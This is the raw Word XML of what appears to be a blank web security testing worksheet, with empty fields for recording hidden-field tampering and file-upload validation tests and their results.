                <w:numId w:val="10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624CEB6" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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D1AEEFE" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B3427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2B459D1C" w14:textId="77777777" w:rsidR="00944EF2" w:rsidRPr="00A51A96" w:rsidRDefault="00944EF2" w:rsidP="00944EF2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4EF2" w14:paraId="3F77DE40" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28A910AB" w14:textId="77777777" w:rsidR="00944EF2" w:rsidRDefault="00944EF2" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78F12D42" w14:textId="77777777" w:rsidR="00944EF2" w:rsidRDefault="00944EF2" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57624592" w14:textId="77777777" w:rsidR="00944EF2" w:rsidRDefault="00944EF2" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7013D0F8" w14:textId="77777777" w:rsidR="00944EF2" w:rsidRDefault="00944EF2" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4344BF9E" w14:textId="77777777" w:rsidR="00944EF2" w:rsidRDefault="00944EF2" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B31F7D7" w14:textId="77777777" w:rsidR="00045D29" w:rsidRDefault="00045D29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0E1BA8" w:rsidRPr="00A51A96" w14:paraId="31E031E4" w14:textId="77777777" w:rsidTr="00430DBD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="62CEC81F" w14:textId="14ECFCBA" w:rsidR="000E1BA8" w:rsidRPr="003C713F" w:rsidRDefault="000E1BA8" w:rsidP="00725128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6.2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27759D" w:rsidRPr="0027759D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for Hidden Field Parameter Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="178B001E" w14:textId="77777777" w:rsidR="000E1BA8" w:rsidRPr="008161A3" w:rsidRDefault="000E1BA8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DC234A" w:rsidRPr="00DC234A" w14:paraId="3B5100D4" w14:textId="77777777" w:rsidTr="008161A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C543AF5" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="008161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C234A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666A83D" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00DC234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C234A" w:rsidRPr="00DC234A" w14:paraId="59E0BB9C" w14:textId="77777777" w:rsidTr="008161A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D99A899" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="008161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C234A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AE5B86A" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00DC234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C234A" w:rsidRPr="00DC234A" w14:paraId="2B4B3D7B" w14:textId="77777777" w:rsidTr="008161A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D8A2851" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="008161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C234A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8395A54" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00DC234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C234A" w:rsidRPr="00DC234A" w14:paraId="70BD8D7D" w14:textId="77777777" w:rsidTr="008161A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0825FEB" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="008161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C234A">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Queries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4A671BF" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="103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06668C8" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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3CE8F12" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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6536F87" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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9EA8942" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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5A0B146" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00DC234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C234A" w:rsidRPr="00DC234A" w14:paraId="18EC41A4" w14:textId="77777777" w:rsidTr="008161A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2E9E40E" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="008161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C234A">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Successfully tested for Hidden Field Parameter Tampering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51DEB970" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00DC234A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DC234A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687CDB0C" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00DC234A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DC234A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DC234A" w:rsidRPr="00DC234A" w14:paraId="6CB7D29F" w14:textId="77777777" w:rsidTr="008161A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A9EE1BB" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="008161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C234A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Field Values Stored as </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC234A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Hidden Fields in HTML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C46A2C3" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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CDF1F42" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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6BEE9BD" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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519CB6D" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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99E17A5" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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0FE094E" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00DC234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C234A" w:rsidRPr="00DC234A" w14:paraId="3EC8526D" w14:textId="77777777" w:rsidTr="008161A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317FD12" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="008161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C234A">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Manipulated Hidden Fields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A54772E" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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56CD8CF" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="106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BC64069" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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FA1D35D" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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E365ABF" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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644218F" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00DC234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A5386" w:rsidRPr="00DC234A" w14:paraId="06D30FB0" w14:textId="77777777" w:rsidTr="008161A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1A14F55" w14:textId="19930965" w:rsidR="002A5386" w:rsidRPr="00DC234A" w:rsidRDefault="002A5386" w:rsidP="008161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A5386">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Server Accepted Modified Hidden Field Data?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A4F7817" w14:textId="77777777" w:rsidR="002A5386" w:rsidRPr="009A60AC" w:rsidRDefault="002A5386" w:rsidP="002A538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9A60A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9A60AC" w:rsidRPr="009A60A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Observed Changes in Response?]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79EB8550" w14:textId="77777777" w:rsidR="009A60AC" w:rsidRDefault="009A60AC" w:rsidP="002A538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46D0E87" w14:textId="5392F095" w:rsidR="009A60AC" w:rsidRPr="00DC234A" w:rsidRDefault="009A60AC" w:rsidP="002A538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A60AC" w:rsidRPr="00DC234A" w14:paraId="654765C8" w14:textId="77777777" w:rsidTr="008161A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A862479" w14:textId="332BC47F" w:rsidR="009A60AC" w:rsidRPr="002A5386" w:rsidRDefault="009A60AC" w:rsidP="008161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A60AC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Impact of Tampering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D639567" w14:textId="77777777" w:rsidR="009A60AC" w:rsidRDefault="009A60AC" w:rsidP="002A538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784334" w:rsidRPr="0078433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Altered Pricing, Unauthorized Access, Logical Flow Manipulation, etc.</w:t>
            </w:r>
            <w:r w:rsidR="0078433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E74C8E8" w14:textId="77777777" w:rsidR="00784334" w:rsidRDefault="00784334" w:rsidP="002A538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732071B" w14:textId="0E3A2B98" w:rsidR="00784334" w:rsidRPr="009A60AC" w:rsidRDefault="00784334" w:rsidP="002A538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C234A" w:rsidRPr="00DC234A" w14:paraId="164DD6AC" w14:textId="77777777" w:rsidTr="008161A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60EF385" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="008161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C234A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6A0F994" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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8936874" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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A1ADAC6" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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3478CFD" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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AF87C15" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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9BD17FB" w14:textId="77777777" w:rsidR="00DC234A" w:rsidRPr="00DC234A" w:rsidRDefault="00DC234A" w:rsidP="00DC234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87C49" w:rsidRPr="00DC234A" w14:paraId="72CBC19F" w14:textId="77777777" w:rsidTr="008161A3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65BE5A9" w14:textId="32308083" w:rsidR="00387C49" w:rsidRPr="00DC234A" w:rsidRDefault="00387C49" w:rsidP="008161A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87C49">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Results Analysis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A81ED84" w14:textId="77777777" w:rsidR="00387C49" w:rsidRDefault="00387C49" w:rsidP="00387C4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051A82E" w14:textId="77777777" w:rsidR="00387C49" w:rsidRDefault="00387C49" w:rsidP="00387C4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DDB2118" w14:textId="77777777" w:rsidR="00387C49" w:rsidRDefault="00387C49" w:rsidP="00387C4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BAB5C90" w14:textId="77777777" w:rsidR="005F105D" w:rsidRDefault="005F105D" w:rsidP="00387C4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E865731" w14:textId="77777777" w:rsidR="00387C49" w:rsidRPr="00DC234A" w:rsidRDefault="00387C49" w:rsidP="00387C4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68C149C0" w14:textId="77777777" w:rsidR="0027759D" w:rsidRDefault="0027759D" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="905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050"/>
      </w:tblGrid>
      <w:tr w:rsidR="006450DE" w:rsidRPr="00A51A96" w14:paraId="2BC9C1FF" w14:textId="77777777" w:rsidTr="00430DBD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6DCEA62B" w14:textId="57967850" w:rsidR="006450DE" w:rsidRPr="003C713F" w:rsidRDefault="006450DE" w:rsidP="00725128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6.3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734B93" w:rsidRPr="00734B93">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for Unrestricted File Upload Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CEF6A18" w14:textId="77777777" w:rsidR="006450DE" w:rsidRPr="008161A3" w:rsidRDefault="006450DE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5"/>
        <w:gridCol w:w="2824"/>
        <w:gridCol w:w="3431"/>
      </w:tblGrid>
      <w:tr w:rsidR="009F7577" w:rsidRPr="009F7577" w14:paraId="2B8E9894" w14:textId="77777777" w:rsidTr="005F105D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="679DB3DE" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="005F105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F7577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255" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="280A3B38" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="009F757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F7577" w:rsidRPr="009F7577" w14:paraId="0E062DC3" w14:textId="77777777" w:rsidTr="005F105D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18803950" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="005F105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F7577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255" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A2379D9" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="009F757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F7577" w:rsidRPr="009F7577" w14:paraId="0F98B75D" w14:textId="77777777" w:rsidTr="005F105D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E164099" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="005F105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F7577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255" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56B8EE3E" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="009F757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F7577" w:rsidRPr="009F7577" w14:paraId="6FC525E2" w14:textId="77777777" w:rsidTr="005F105D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70BF2168" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="005F105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F7577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Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F717C94" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="009F757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F7577" w:rsidRPr="009F7577" w14:paraId="36DF8D3E" w14:textId="77777777" w:rsidTr="005F105D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="794B537F" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="005F105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F757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Whether the Target Server Allows Unrestricted File Upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2824" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59CF2DD7" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="009F7577">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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9F7577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431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C1E70EF" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="009F7577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9F7577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9F7577" w:rsidRPr="009F7577" w14:paraId="651837F6" w14:textId="77777777" w:rsidTr="005F105D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="393A4649" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="005F105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F757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Validation on Approved File Types or Size is Done at</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2824" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0BA7324B" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="009F7577">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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9F7577">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Server-Side</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28411D92" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="009F7577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9F7577">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Client-Side</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F7577" w:rsidRPr="009F7577" w14:paraId="6FA34DF6" w14:textId="77777777" w:rsidTr="005F105D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D27D4F8" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="005F105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F757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Does the Target Application allow Upload of Oversize Files, Files</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C2230EC" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="005F105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F757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Embedded With Virus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2824" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36BB86E8" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="009F7577">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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9F7577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431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53333C76" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="009F7577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9F7577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9F7577" w:rsidRPr="009F7577" w14:paraId="10559243" w14:textId="77777777" w:rsidTr="005F105D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66F2C110" w14:textId="69CF9EC1" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="005F105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F757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Does the Application </w:t>
            </w:r>
            <w:r w:rsidR="005F105D" w:rsidRPr="009F757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Evaluate</w:t>
            </w:r>
            <w:r w:rsidRPr="009F757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 the Uploaded File through </w:t>
            </w:r>
            <w:r w:rsidR="005F105D" w:rsidRPr="009F757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Content</w:t>
            </w:r>
            <w:r w:rsidRPr="009F757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 in </w:t>
            </w:r>
            <w:r w:rsidR="005F105D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the </w:t>
            </w:r>
            <w:r w:rsidRPr="009F757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HTTP Request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2824" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09E575D5" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="009F7577">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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9F7577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431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42E618E3" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="009F7577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9F7577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9F7577" w:rsidRPr="009F7577" w14:paraId="407FF874" w14:textId="77777777" w:rsidTr="005F105D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DD8C6FE" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="005F105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F757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Is Authorization Required for File Upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2824" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4056D005" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="009F7577">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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9F7577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431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
